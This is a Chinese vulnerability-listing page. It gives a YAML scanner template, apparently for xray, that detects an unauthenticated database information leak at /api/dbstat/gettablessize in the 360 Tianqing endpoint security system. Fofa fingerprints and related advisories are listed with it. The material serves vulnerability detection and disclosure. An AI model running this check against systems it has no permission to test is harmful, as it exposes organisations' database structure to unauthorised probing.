360tianqing-gettablessize-database-info-leakage: 360天擎 gettablessize 数据库信息泄露漏洞

漏洞描述

PoC代码[已公开]

id: 360tianqing-gettablessize-database-info-leakage

info:
  name: 360天擎 gettablessize 数据库信息泄露漏洞
  author: daffainfo,你是猪
  severity: medium
  verified: true
  description: 360天擎 存在未授权越权访问，造成敏感信息泄露 title="360新天擎" app="360天擎终端安全管理系统"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/360%E5%A4%A9%E6%93%8E%20gettablessize%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /api/dbstat/gettablessize
    expression: response.status == 200 && response.body.bcontains(b'"schema_name":') && response.body.bcontains(b'"reason":') && response.body.bcontains(b'"table_name":')
expression: r0()

相关漏洞推荐

• qianxin-360tianqing-getsimilarlist-sqli: 奇安信360天擎getsimilarlistSQL注入漏洞 POC

  2025-09-01 | 奇安信360天擎
  奇安信360天擎getsimilarlistSQL注入漏洞 Fofa: body="/task/index/detail?id={item.id}" Fofa: title=&qu...

• 360 天擎终端安全管理系统未授权管理员登录 无POC

  2023-09-22 | 360天擎终端安全管理系统
  360天擎企业版是360推出的一款集终端安全管控功能的防病毒软件，专门面向政府企业等大型企事业单位而推出，作为新一代企业终端安全产品，采用了全新的安全防御技术。在6.6及以下版本中，登录接口存在绕过登...

• 360-天擎系统 save_client_log.json sql注入 无POC

  2021-09-27 | 360天擎系统
  天擎是奇安信的一款终端安全管理系统产品，该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体，权限极高。文件save_client_log.json处存在sql内容拼接，造成...

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...